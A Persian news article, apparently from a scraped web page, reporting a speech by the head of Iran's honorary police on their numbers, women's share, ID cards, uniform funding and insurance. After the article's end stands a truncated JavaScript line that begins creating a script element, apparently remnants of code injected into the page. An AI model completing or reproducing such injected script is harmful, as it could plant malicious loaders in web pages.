فعالیت ۳۴ هزار پلیس افتخاری در کشور


مدیرکل پلیس افتخاری نیروی انتظامی گفت: بیش از ۳۴ هزار پلیس افتخاری در کنار نیروی انتظامی فعالیت می‌کنند که۱۱ هزار نفر آنان را بانوان تشکیل می‌دهند.

به گزارش سادس، سرهنگ امیری در همایش پلیس افتخاری همیاران اربعین استان ایلام اظهار کرد: در تمام جوامع بین‌المللی جامعه‌ای موفق است که بتواند از ظرفیت مشارکت عمومی بهره ببرد.  

وی با بیان اینکه ناجا در حوزه مشارکت به جایگاه خود واقعی خود دست پیداکرده است و سعی دارد این ظرفیت را افزایش دهد افزود: خروجی بسیار خوبی در استفاده از ظرفیت‌های پلیس افتخاری داریم و همین امر موجب شده است محدودیت‌های جذب را برداریم.  

مدیرکل پلیس افتخاری نیروی انتظامی تصریح کرد:با وصف فعالیت۳۴ هزاری پلیس افتخاری در کشور ، ما شاهد کمترین تخلفات و جرائم در بین این عزیزان هستیم که نشأت‌گرفته از آموزش ارائه‌شده است.  

امیری خاطرنشان کرد: نواقصی درروند کار وجود دارد که به دنبال آن هستیم این نواقص را رفع کنیم تا بتوانیم بهره‌برداری بهتری از ظرفیت پلیس افتخاری داشته باشیم.  

وی به صدور کارت شناسایی پلیس‌های افتخاری اشاره کرد و گفت: زیرساخت‌های لازم سخت‌افزاری و نرم‌افزاری صدور کارت اندیشه شده است و این کارت بعد از هماهنگی‌های لازم صادر خواهد شد.  

امیری یادآور شد: یکی از مهمترین مأموریت‌های پلیس نگهداشت نیرو و صیانت از پلیس افتخاری در انجام مأموریت‌ها است.  

وی افزود: تأمین اعتبار سه میلیارد تومانی لباس زمستانه و تابستانه پلیس افتخاری انجام شده که منتظریم بعد از تصویب آن را در اختیار قرار دهیم.  

مدیرکل پلیس افتخاری نیروی انتظامی گفت: مشکل بیمه تا سقف ۴۰ هزار پلیس افتخاری را حل کرده و دنبال این هستیم تا تمام دغدغه‌های پلیس افتخاری را رفع کنیم.

انتهای پیام

var d=document;var s=d.createElement(‘script’);

دسته‌بندی نشده

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *